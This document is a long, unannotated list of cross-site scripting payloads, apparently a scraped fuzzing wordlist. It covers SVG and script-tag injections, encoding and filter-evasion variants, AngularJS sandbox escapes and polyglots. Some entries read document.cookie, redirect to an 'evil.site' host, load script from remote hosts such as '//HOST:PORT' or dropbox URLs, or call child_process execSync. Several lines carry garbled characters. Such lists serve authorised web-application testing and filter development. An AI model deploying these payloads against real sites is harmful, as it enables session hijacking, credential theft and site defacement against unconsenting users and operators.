- <svg onload=setInterval(function(){with(document)body.appendChild(createElement(‘script’)).src=’//HOST:PORT’},0)>
- <svg/onload=setTimeout`alert\`1\``>
- <svg onload svg onload=”javascript:javascript:alert(1)”></svg onload>
- <svg onLoad svg onLoad=”javascript:javascript:alert(1)”></svg onLoad>
- <svg/onload=top[��loca��%2b��tion��]=name//
- <svg/onload=top[loca%2btion]=name//
- <svg/onload=top[/loca/.source%2b/tion/.source]=name//
- <svg/onload=u=URL,l=u.length,location=/javascrip/.source%2Bu[1]%2Bu[4]%2B/alert/.source%2Bu[l-2]%2b1%2Bu[l-1]>#()
- <svg/onload=u=URL,l=u.length,location=/javascrip/.source+u[1]+u[4]+/alert/.source+u[l-2]+1+u[l-1]>#()
- <svg onload=”void ‘javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e’;”></svg>
- <svg onload=”void ‘javascript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d
- <svg/onload=window.onerror=alert;throw/XSS/;//
- <svg/onload=window.onerror=confirm;throw/5/;//
- <svg/onload=window.onerror=confirm;throw/XSS/;//”
- <svg/onload=window.onerror=confirm;throw/XSS/;//
- <svg onload=write(1)>
- <svg onresize=”alert(1)”>
- <svg onResize svg onResize=”javascript:javascript:alert(1)”></svg onResize>
- <svg onunload svg onunload=”javascript:javascript:alert(1)”></svg onunload>
- <svg onUnload svg onUnload=”javascript:javascript:alert(1)”></svg onUnload>
- <svg><oooooo/oooooooooo/onload=alert(1) >
- <svg o<script>nload=alert(1)>
- <svg o<script>nload=alert(6)>
- <sVG/renwa/OnLoaD+=”window[‘confirm’]+(1)”>
- <sVg><scRipt %00>alert(1) {Opera}
- <sVg><scRipt %00>confirm(1)
- <sVg><scRipt %00>prompt(/@soaj1664ashar/)????????????????
- <svg><script>0<[alert(36)]</script>
- <svg><script>123<1>alert(123)</script>
- <svg><script>alert( 1)
- <svg><script ?>alert(1)
- “><svg><script>alert`1`
- “><svg><script>/<@/>alert(1337)</script>
- <svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)</script>
- <svg><script>/<@/>alert(1)</script>//INJECTX
- <svg><script>alert(1)//!#ERROR?&^%$#</script></svg>
- <svg><script>alert( 1)
- <svg><script>alert( 1)
- <svg><script>alertƑ)
- <Svg> <script> alert & # 40 1 & # 41
- <svg><script>alert(/1/)</script>
- <Svg> <script> alert & # 40/1 / & # 41 </ script>
- <svg><script>alert`1`<p>
- <svg><script>alert`1`<p>
- <sVg><scRipt >alert(1) {Opera}
- <svg><script>alert(1)</script>
- <svg><script>a=’<svg/onload=alert(1)></svg>’;alert(2)</script>
- <svg><script>a<svg//onload=confirm(2) />lert(1)</script>
- <svg><script><![CDATA[\]]><![CDATA[u0061]]><![CDATA[lert]]>(1)</script>
- <svg><script ?>confirm(1);
- <svg><script ?>confirm(1)
- <svg><script>confirm(/1/)</script>
- <svg><script>confirm`1`<p><svg><script>confirm`1`<p>
- <svg><script>confirm(“");confirm(‘yes’)//no”)</script>
- <svg><script>location=<>javascript&#x3A;alert(1)<!/></script>
- <svg><script>location=<>javascript&#x3A;confirm(1)<!/></script>
- <svg><script>/**/alert(‘ @0x6D6172696F ‘)//*/</script></svg>?
- <svg><script>/**/confirm(3)//*/</script></svg>
- <svg><script>//
confirm(1);</script </svg>
- <svg><script>//
confirm(1);</script </svg>
- “/><svg><script>//
confirm(1);</script </svg>
- <svg><script onlypossibleinopera:-)> alert(1)
- <svg><script onlypossibleinopera:-)> alert(1)
- <svg><script onlypossibleinopera:-)> confirm(1)
- <svg><script>prompt( 1)<i>
- <svg><script>prompt(1)<b>
- <svg><script>prompt(1)</script>
- <svg><script>varmyvar=”text”;alert(1)//”;</script></svg>
- <svg><script>varmyvar=”text";alert(1)//”;</script></svg>
- <Svg> <script> varmyvar = “text & quot ;; alert (1) //”; </ script> </ svg>
- <svg><script>varmyvar=vYourInputv;</script></svg>
- <svg><script>varmyvar=YourInput;</script></svg>
- <Svg> <script> varmyvar = “YourInput”; </ script> </ svg>
- <svg><script x:href=’https://dl.dropbox.com/u/13018058/js.js'
- <svg><script x:href=’https://dl.dropbox.com/u/13018058/js.js' {Opera}
- <svg><script/XL:href= data:;;;base64;;;;,<>��YWx��lc��nQ��oMSk��=> mix!
- <svg><script xlink:href=”data:,alert(1)”>
- <svg><script xlink:href=data:,alert(1) /> *
- <svg><script xlink:href=data:,alert(1) />
- <svg><script xlink:href=data:,alert(1) />
- “><svg><script/xlink:href=”data:,alert(1)
- <svg><script xlink:href=data:,alert(174) />
- <svg><script xlink:href=data:,alert(1)></script>
- <svg><script/xlink:href=data:,alert(1)></script>
- <svg><script xlink:href=data:,window.open(‘https://www.google.com/')></script
- <svg><script xlink:href=data:,window.open(‘https://www.google.com/') </script
- <svg><set href=#k attributename=href to=data:,alert(59)><script id=k></script>
- <svg><style>{font-family:’<iframe/onload=confirm(1)>’
- <svg><style>*{font-family:’<svg onload=alert(1)>’;}</style></svg>
- <svg><style>*{font-family:’<svg onload=confirm(1)>’;}</style></svg>
- <svg><style><img/src=x onerror=alert(1)// </b>
- <svg><style><img src=x onerror=confirm(1)></svg>
- “><svg><style>{-o-link-source:’<body/onload=confirm(1)>’
- </svg>’’<svg><script ‘AQuickBrownFoxJumpsOverTheLazyDog’>alert(1) {Opera}
- </svg>’’<svg><script ‘AQuickBrownFoxJumpsOverTheLazyDog’>confirm(1)
- <svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
- <svg[U+000B]onload=alert(1)>
- <svg><use xlink:href=”data:image/svg+xml;ba 
se	64;,PHN2ZyBpZD 0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53M y5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodH RwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3a WR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+DQo8 YSB4bGluazpocmVmPSJqYXZhc2NyaXB0OmFsZXJ0K GxvY2F0aW9uKSI+PHJlY3QgeD0iMCIgeT0iMCIgd2lk dGg9IjEwMCIgaGVpZ2h0PSIxMDAiIC8+PC9hPg0KPC 9zdmc+#rectangle” /></svg>
- <svg><use xlink:href=data:image/svg+xml;base64,PHN2ZyBpZD0iYnJ1dGUiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgeG1sbnM6eGxpbms9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGxpbmsiPg0KPGVtYmVkIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIiBzcmM9ImphdmFzY3JpcHQ6YWxlcnQoZG9jdW1lbnQuZG9tYWluKSIvPjwvc3ZnPg==#klutz>
- <svg><use xlink:href=’data:image/svg+xml,<svg id=”klutz” xmlns=”http://www.w3.org/2000/svg" xmlns:xlink=”http://www.w3.org/1999/xlink"><embed xmlns=”http://www.w3.org/1999/xhtml" src=”javascript:alert(document.domain)”/></svg>#klutz’>
- <svg><!V-alert(1)-
- <svg><!V’-alert(1)-’
- <svg width=12cm height=9cm><a><image href=//brutelogic.com.br/yt.jpg /><animate attributeName=href values=javascript:alert(1)>
- <svg xml:base=”data:text/html,<script>confirm(1)</script>”><a xlink:href=”#”><circle r=”40"></circle></a></svg>
- <svg xmlns=”http://www.w3.org/2000/svg">
- <svg xmlns=��http://www.w3.org/2000/svg��>
- <svg xmlns=”http://www.w3.org/2000/svg"> <a xmlns:xlink=”http://www.w3.org/1999/xlink" xlink:href=”javascript:alert(9)”><rect width=”1000" height=”1000" fill=”white”/></a> </svg>
- <svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:alert(1)”></g></svg>
- <svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:alert(9)”></g></svg>
- <svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:confirm(1)”></g></svg>
- <svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:\u0061lert(1);”></g></svg> //
- <svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:\u0061lert(1);”></g></svg>
- <svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:\u0061lert(1);”></g></svg>
- <Svg xmlns = “http://www.w3.org/2000/svg"> <g onload = “javascript: \ u0061lert (1);”> </ g> </ svg>
- <svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:\u0061lert(1);”></g></svg> // By Secalert
- <svg xmlns=”http://www.w3.org/2000/svg" id=”foo”>
- <svg xmlns=”http://www.w3.org/2000/svg" id=”x”>
- <svg xmlns=”http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>
- <svg xmlns=”http://www.w3.org/2000/svg" onload=”alert(document.domain)”/>
- <svg xmlns=”http://www.w3.org/2000/svg"><script>alert(1)</script></svg>
- <svg xmlns=”http://www.w3.org/2000/svg" xmlns:xlink=”http://www.w3.org/1999/xlink">
- <svg xmlns=”#”><script>alert(1)</script></svg>
- <svg xmlns:xlink=”http://www.w3.org/1999/xlink"><a><circle r=100
- <svg xmlns:xlink=”http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName=”xlink:href”
- <svg xmlns:xlink=”http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName=”xlink:href” values=”;javascript:alert(1)” begin=”0s” dur=”0.1s” fill=”freeze”/>
- <Svg xmlns: xlink = “http://www.w3.org/1999/xlink"> <a> <circle r = 100 /> <animate attributeName = “xlink: href” values ??= “; javascript: alert (1 ) “begin =” 0s “dur =” 0.1s “fill =” freeze “/>
- <svg xmlns:xlink=”http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName=”xlink:href” values=”;javascript:alert(1)” begin=”0s” dur=”0.1s” fill=”freeze”/> // By Mario
- <svg xmlns:xlink=”http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName=”xlink:href” values=”;javascript:confirm(1)” begin=”0s” dur=”0.1s” fill=”freeze”/>
- <svg xmlns:xlink=http://www.w3.org/1999/xlink><animate xlink:href=#x attributeName=”xlink:href” values=” javascript:alert(10)” /><a id=x><rect width=100 height=100 /></a>
- <svg xmlns:xlink=http://www.w3.org/1999/xlink><animate xlink:href=#x attributeName=”xlink:href” values=” javascript:alert(1)” /><a id=x><rect width=100 height=100 /></a>
- <svg xmlns:xlink=” r=100 /><animate attributeName=”xlink:href” values=”;javascript:alert(1)” begin=”0s” dur=”0.1s” fill=”freeze”/>
- <svg xmlns:xlink=” r=100 /><animate attributeName=”xlink:href” values=”;javascript:alert(1)” begin=”0s” dur=”0.1s” fill=”freeze”/>
- <svG x=”>” onload=(co\u006efirm)``>
- <svg><x><script>alert(177)</x>
- <svg><x><script>alert(1)</x>
- <svg/x=”> <script>alert(37)</script> <”onload=alert(370)>
- <svg><x><script>alert('1')</x>
- <svg></ y=”><x” onload=alert(‘@0x6D6172696F’)>
- <svg></y=”><x” onload=alert(1)>
- <svg></ y=”><x” onload=confirm(4)>
- swfupload.swf?buttonText=test<a href=”javascript:confirm(1)”><img src=”https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swf
- swfupload.swf?movieName=”]);}catch(e){}if(!self.a)self.a=!alert(1);//
- <[S]x onx[S]xx=1
- ‘/(\t)/’,
- <table background=”javascript:alert(1)”></table>
- <table background=javascript:alert(1)></table>
- <table background=javascript:alert(1)></table> // Works on Opera 10.5 and IE6
- <TABLE BACKGROUND=”javascript:alert(‘XSqS’)”>
- <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
- <TABLE BACKGROUND=”javascript:alert(XSS)”>
- <table background=javascript:alert(/xss/)></table>/
- <;TABLE BACKGROUND=”;javascript:alert(‘;XSS’;)”;>;<;/TABLE>;
- <TABLE BACKGROUND=”javascript:alert(‘XSS’)”></TABLE>
- <TABLE BACKGROUND=”javascript:confirm(document.location)”>
- <table BACKGROUND=”javascript:document.vulnerable=true;”>
- <table background=”javascript:javascript:alert(1)”>
- <TABLE BACKGROUND=”javascript:javascript:alert(1)”>
- <TABLE id=XSS BACKGROUND=”javascript:alert(‘XSS’)”>
- <TABLE id=XSS><TD BACKGROUND=”javascript:alert(‘XSS’)”>
- <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>”
- <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
- <TABLE><TD BACKGROUND=”javascript:alert(XSS)”>
- <;TABLE>;<;TD BACKGROUND=”;javascript:alert(‘;XSS’;)”;>;<;/TD>;<;/TABLE>;
- <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”></TD></TABLE>
- <table><TD BACKGROUND=”javascript:document.vulnerable=true;”>
- <TABLE><TD BACKGROUND=”javascript:javascript:alert(1)”>
- <table><thead%0Cstyle=font-size:700px%0Donmouseover%0A=%0Bconfirm(1)%09><td>AAAAAAAAA
- <table><thead%0Cstyle=font-size:700px%0Donmouseover%0A=%0Bprompt(1)%09><td>AAAAAAAAA
- <TAG EVENT=alert(1)>
- <tag handler=code>
- {tag}<img name=”{/tag} <img src=xx:x onerror=alert({{i}})//”>
- <TAG RESOURCE=javascript:alert(1)>
- tags =querySelectorAll(“.class1”);
- tags =querySelectorAll(“[data-foo]”);
- tags =querySelectorAll(“[data-foo^=bar]”);
- tags =querySelectorAll(“myTag”);
- tags = querySelectorAll(“#someId”);
- </tag><svg onload=alert(1)>
- “></tag><svg onload=alert(1)>
- ?TargetAS=javascript:alert(1)”,
- target=x><input type=hidden name=comment>click me!</form>
- ?t=confirm(1)&k7=”><svg/t=’&k8=’onload=’/&k9=/+eval(t)’
- <TD BACKGROUND=”javascript:alert(‘XSS’)”>
- <td width=”628" background=”/img/index2_r7_c2_r1_c5_s1_s1.jpg”>
- ‘te’ ? alert(‘ifelsesh’) : ‘xt’;
- ‘te’ ^ alert(‘^’) ^ ‘xt’;
- ‘te’ < alert(‘<’) < ‘xt’;
- ‘te’ == alert(‘==’) == ‘xt’;
- ‘te’ > alert(‘>’) > ‘xt’;
- ‘te’ | alert(‘|’) | ‘xt’;
- ‘te’ — alert(‘-’) — ‘xt’;
- ‘te’ , alert(‘,’) , ‘xt’;
- ‘te’ ; alert(‘;’) ; ‘xt’;
- ‘te’ ? alert(‘?:’) : ‘xt’;
- ‘te’ / alert(‘/’) / ‘xt’;
- ‘te’ * alert(‘*’) * ‘xt’;
- ‘te’ & alert(‘&’) & ‘xt’;
- ‘te’ % alert(‘%’) % ‘xt’;
- ‘te’ + alert(‘+’) + ‘xt’;
- ‘te’ in alert(‘in’) in ‘xt’;
- ‘te’ instanceof alert(‘instanceof’) instanceof ‘xt’;
- template is=dom-bind div
- ><test onclick=alert(/Xss-By-Muhaddi/)>Click Me</test>
- ><test onclick=alert(/Xss/)>Click Me</test>
- ��><test onclick=alert(/Xss/)>Click Me</test>
- test=scriptx=document.createElement(%27script%27);x.innerHTML=%27confirm(location)%27;document.body.appendChild(x);/script¬bot=UzXGjMCo8AoAAFUcKTEAAAAN
- ‘text’ ( alert(‘()’) );
- ‘text’ [ alert(‘[]’) ];
- text;alert(1)//
- <textarea autofocus onfocus=alert(1)>
- <textarea autofocus onfocus=alert(1)>//INJECTX
- <textarea autofocus onfocus=confirm(3)>
- “><textarea autofocus onfocus=co\u006efir\u006d(1)>
- “><textarea autofocus onfocus=prompt(1)>
- <!</textarea <body onload=’alert(1)’>
- </textarea><br><code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code>
- <textarea id=ta onfocus=%22write(‘<script>alert(1)</script>’)%22 autofocus></textarea>
- <textarea id=ta onfocus=%22write(‘<script>confirm(1)</script>’)%22 autofocus></textarea>
- <textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open(‘GET’%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)’%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
- <textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open(‘GET’%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520confirm(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)’%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
- <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = ‘(.*?)’/)[1])</script>
- <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));confirm(ta.value.match(/cookie = ‘(.*?)’/)[1])</script>
- “/><textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));confirm(ta.value.match(/cookie = ‘(.*?)’/)[1])</script>
- <textarea id=XSS onfocus=javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>
- <textarea>jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e</textarea>
- <textarea name=’file”; filename=”test.<img src=a onerror=document&#46;location&#61;&#34;http:&#47;&#47;evil&#46;site&#34;>’>
- <textarea name=p id=p>”
- <textarea name=p id=p>
- “<textarea onmousemove=’confirm(1);’>”
- </textarea>’”><script>alert(document.cookie)</script>
- </textarea>’”><script>alert(document.cookie)</script>
- </textarea><script>alert(/xss/)</script>
- </textarea>’”><script>alert(XSS)</script>
- </textarea><ScRiPt>prompt(/man shum/)</ScRiPt//
- ‘//” →</textarea></style></script></title><b onclick= alert()//>*/alert()/*
- <textarea></textarea>test<! — </textarea><img src=xx: onerror=confirm(1)> →
- textContent, nextSibling.nodeValue, firstChild.nodeValue, lastChild.nodeValue, innerHTML
- this+1;
- this[[]+(‘eva’)+(/x/,new Array)+’l’](/xxx.xxx.xxx.xxx.xx/+name,new Array)
- this[Object[“keys”](this)[146]](1)
- this[Object[“keys”](this)[5]](1)
- this[“ownerDocu”+”ment”][“loca”+”tion”]=��//google.com��
- three=”{{set(‘me’,nextSibling.previousSibling)}}”
- throw delete~typeof~confirm(1)/
- \));throw_error()}catch(e){alert(document.domain))}//
- <TimeDisplayFont>Arial</TimeDisplayFont>
- <TimeDisplayFontColor>000000</TimeDisplayFontColor>
- <TimeDisplayFormat>MM:SS</TimeDisplayFormat>
- </title””>
- <””/title>
- <title>*/;alert(2);function%20text(){};function%20html(){}
- </title><frameset><frame src=”data:text/html, fill the whole page and overlap everything<script>confirm(1)</script>”>
- </title><frameset><frame src=”data:text/html,<script>confirm(1)</script>”>
- </title id=””>
- <title><img src=”</title><img src=x onerror=alert(1)//”> // by evilcos
- <title>jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e</title>
- <title onpropertychange=alert(1)></title><title title=>
- <title onpropertychange=alert(1)></title><title title=></title>
- <title onpropertychange=javascript:alert(1)></title><title title=>
- <title onPropertyChange title onPropertyChange=”javascript:javascript:alert(1)”></title onPropertyChange>
- ‘“></title><script>alert(1111)</script>
- ‘“></title><script>alert(1111)</script>
- ‘“></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>
- </title></script>”-alert(187)-”><svg onload=’;alert(1870);’>
- </title><script>alert(1)</script>
- </title></script>”-alert(46)-”><svg onload=’;alert(460);’>
- </TITLE><SCRIPT>alert(“XSS”)
- ‘“></title><script>alert(“XSS by \nxss”)</script>><marquee><h1>XSS by xss</h1></marquee>
- “>></title><script>alert(“XSS by \nxss”)</script>><marquee><h1>XSS by xss</h1></marquee>
- </title><script>alert(/xss/)</script>
- <;/TITLE>;<;SCRIPT>;alert(“XSS”);<;/SCRIPT>;
- </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
- </title><SCRIPT>document.vulnerable=true;</script>
- </title>”/</script></style></textarea/ →*/<alert()/*’ onclick=alert()//>/
- /</title/’/</style/</script/ →<p” onclick=alert()//>*/alert()/*
- /</title/’/</style/</script/</textarea/ →<p” onclick=alert()//>*/alert()/*
- </title></style></textarea> →</script><a”//’ onclick=alert()//>*/alert()/*
- </title></textarea></style></script →<li ‘//” ‘*/alert()/*’, onclick=alert()//
- toJSON=alert;JSON.stringify(window);
- top[630038579..toString(30)](1)
- top[8680439..toString(30)](1)
- top[8680439..toString(30)](7);
- top[8680439..toString(30)](90)
- top[‘al\145rt’](1)
- top[‘al\145rt’](88)
- top[“al”+”ert”](1)
- top[“al”+”ert”](5);
- top[“al”+”ert”](85)
- top[/al/.source+/ert/.source](1)
- top[/al/.source+/ert/.source](8);
- top[/al/.source+/ert/.source](86)
- top[‘al\x65rt’](1)
- top[‘al\x65rt’](89)
- top[‘al\x65rt’](9);
- top[atob(‘cHJvbXB0’)]()
- top[‘con’.concat(‘firm’)](1)
- top.require(‘child_process’).execSync(‘open -a Calculator’)
- top[unescape(‘%61%6c%65%72%74’)]()
- “”+{toString:alert}
- {…{toString:()=>alert()}}
- toString=alert; this+’1';
- {{{}.toString.constructor(‘confirm(1)’)()}}
- {{ (toString()).constructor.prototype.charAt=(toString()).constructor.prototype.concat;
- {{ (toString()).constructor.prototype.charAt=(toString()).constructor.prototype.concat; $eval((toString()).constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)) }}
- {{toString.constructor.prototype.toString=toString.constructor.prototype.call%3b[%22a%22,%22alert(1)%22].sort(toString.constructor)}}
- {{toString.constructor.prototype.toString=toString.constructor.prototype.call;[“a”,”alert(1)”].sort(toString.constructor);}}
- {{toString.constructor.prototype.toString=toString.constructor.prototype.call;[“a”,”alert(1)”].sort(toString.constructor)}}
- {{{}[{toString:[].join,length:1,0:’__proto__’}].assign=[].join; ‘a’.constructor.prototype.charAt=[].join; $eval(‘x=alert(1)//’); }}
- {{ {}[{toString:[].join,length:1,0:’__proto__’}].assign=[].join; ‘a’.constructor.prototype.charAt=’’.valueOf; $eval(‘x=alert(1)//’); }}
- toUpperCase XSS document.write(‘<? oncl?ck=alert(1)>asd</?>
- try{?????????????????????????????=0;?????????????????????????????()}catch(e){alert(e)}
- try{‘a’ (alert(1)) in ‘a’}catch(e){ ‘a’ (alert(2)) instanceof ‘a’}
- try{confirm(document.domain)}catch(e){location.reload()}
- (()=>{try{return alert(1),eval(‘throw 1’);}catch(e){return alert(2)}finally{return alert(3)}})()
- try{!/\s/.test(‘\u0085’)&&eval(‘\u0085alert(“IE”)’)}catch(e){alert(‘Not IE’)}
- <t:set attributeName=”innerHTML” to=”XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>”>
- <t:set attributeName=”innerHTML” to=”XSS<SCRIPT DEFER>alert(“XSS”)</SCRIPT>”>
- two={{set(‘_nodes.0.scriptprop.src’,’data:\,’)}}
- typeof delete typeof delete void void new new alert`1`
- %u0022%u003e
- %u0022%u003e%u003cscript%u003ealert(1);%u003c/script%u003e
- %u0022%u003e%u003cscript%u003ealert(%u0027XSS%u0027);%u003c/script%u003e
- %u0022%u003e%u003cscript%u003ealert%u0028%u0027Hello%u0027%u0029%u003c%u002fscript%u003e
- %u0022%u003e%u003cscript%u003ealert%u0028%u0027XSS%u0027%u0029%u003b%u003c%uff0fscript%u003e
- %u0022%u003e%u003cscript%u003ealert(XSS);%u003c/script%u003e
- %u0025%u0075%u0066%u0066%u0031%u0063%u0073%u0063%u0072%u0069%u0070%u0074%u0025%u0075%u0066%u0066%u0031%u0065%u0061%u006c%u0065%u0072%u0074%u0028%u0018%u0058%u0053%u0053%u0019%u0029%u003b%u0025%u0075%u0066%u0066%u0031%u0063%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u0025%u0075%u0066%u0066%u0031%u0065
- \u0027-confirm`1`-\u0027
- \u003c
- \u003C
- \u003cimg src=1 onerror=alert(/xss/)\u003e
- u003cimg src=1 onerror=alert(/xss/)u003e
- \u003Cimg\u0020src=1\u0020onerror=alert(1)\u003e
- %u003cscript%u003ealert(1);%u003c/script%u003e
- %u003cscript%u003ealert(%u0027XSS%u0027);%u003c/script%u003e
- %u003cscript%u003ealert%u00281uff09%u003b%u003c%uff0fscript%u003e
- %u003cscript%u003ealert%u0028%u0027XSS%u0027%u0029%u003b%u003c%uff0fscript%u003e
- %u003cscript%u003ealert(XSS);%u003c/script%u003e
- \u003cscript\u003econfirm(\u0027XSS\u0027)\u003c/script\u003e
- \u003csvg/onload=alert`1`\u003e
- %u003csvg onload=alert(55)>
- \u003e
- \u003E
- \u0061lert(1)
- \u0061\u006c\u0065\u0072\u0074
- \u0061\u006c\u0065\u0072\u0074(1)
- \u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
- [U+2028]confirm(1)
- [U+2028]prompt(1)[U+2028] →
- U+2200 = [0x00][0x00][0x22][0x00]
- %u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A
- %u3008svg onload=alert(56)>
- > U+3C00 = [0x00][0x00][0x3C][0x00]
- < U+3E00 = [0x00][0x00][0x3E][0x00]
- \u{61}l\u{65}rt`1`
- \u{61}|\u{65}rt`1`
- u;alert(1)//
- %uff02%uff1e
- %uff02%uff1e%uff1cscript%uff1ealert(1);%uff1c/script%uff1e
- %uff02%uff1e%uff1cscript%uff1ealert(%uff07XSS%uff07);%uff1c/script%uff1e
- %uff02%uff1e%uff1cscript%uff1ealert%uff081uff09%uff1b%uff1c%uff0fscript%uff1e
- %uff02%uff1e%uff1cscript%uff1ealert%uff08%uff07XSS%uff07%uff09%uff1b%uff1c%uff0fscript%uff1e
- %uff02%uff1e%uff1cscript%uff1ealert(XSS);%uff1c/script%uff1e
- %uff1cimg%20src=x%20onerror=prompt(1)%uff1e
- %uff1cscript%uff1ealert(1234)%uff1c/script%uff1e
- %uff1cscript%uff1ealert(1);%uff1c/script%uff1e
- %uff1cscript%uff1ealert(1)%uff1c/script%uff1e
- %uff1cscript%uff1ealert(%uff07XSS%uff07);%uff1c/script%uff1e
- %uff1cscript%uff1ealert%uff081uff09%uff1b%uff1c%uff0fscript%uff1e
- %uff1cscript%uff1ealert%uff08%uff07XSS%uff07%uff09%uff1b%uff1c%uff0fscript%uff1e
- ‘%uff1cscript%uff1ealert(‘XSS’)%uff1c/script%uff1e’”>>”
- ‘%uff1cscript%uff1ealert(‘XSS’)%uff1c/script%uff1e’
- %uff1cscript%uff1ealert(XSS);%uff1c/script%uff1e
- %uff1cscript%uff1econfirm%uff0876310%uff09%uff1c/script%uff1e
- %uff1csvg onload=alert(57)>
- \uff1c\uff53\uff43\uff52\uff49\uff50\uff54\uff1e\uff41\uff4c\uff45\uff52\uff54\uff08\uff07\uff58\uff53\uff53\uff07\uff09\uff1c\uff0f\uff53\uff43\uff52\uff49\uff50\uff54\uff1e
- %uff1c%uff53%uff43%uff52%uff49%uff50%uff54%uff1e%uff41%uff4c%uff45%uff52%uff54%uff08%uff07%uff58%uff53%uff53%uff07%uff09%uff1c%uff0f%uff53%uff43%uff52%uff49%uff50%uff54%uff1e
- %ufflcxss%2f%uffle
- <ul><li><svg onload=”confirm(1)”></li></ul>
- u/><marquee onfinish=confirm(123)>a</marquee>
- [unescape(‘%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74’)]
- [unescape(‘%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74’)][atob(‘ZGVmYXVsdFZpZXc=’)][8680439..toString(30)](1)
- (unescape([…escape(i)].filter((a,b)=>b%12<1|b%12>9?a:0).join([])))()
- unescape(escape(“????????”).replace(/u../g,’’))
- ;(unescape=eval);
- ;(unescape=eval); // redeclare functions
- ?URI=javascript:alert(1)”,
- */(URL[%26quot;\142\151\147%26quot;][%26quot;\143\157\156\163\164\162\165\143\164\157\162%26quot;](%26quot;\141\154\145\162\164\75\141\154\145\162\164\50\61\51%26quot;)())’%3E%3C%%20style=’x:expression/*
- url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2830%29%3C%2%73%63%72%69%70%74%3E”>
- ?url=javascript:alert(1)”,
- <url>javascript:alert(document.domain)</url>
- [url=javascript:alert(‘XSS’);]click me[/url]
- ‘/(\/\*.*\*\/)/Us’,
- uscriptualert(EXSSE)u/scriptu
- ?userDefined=’);function someFunction(a){}alert(1)//”,
- utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80
- UTF-7: +ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4-
- utf-8&v=XSS
- +/v8-+ADw-script+AD4-alert(28)+ADw-/script+AD4-
- <! — <value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG id=XSS SRC=”javas<![CDATA[cript:alert(‘XSS’);”>
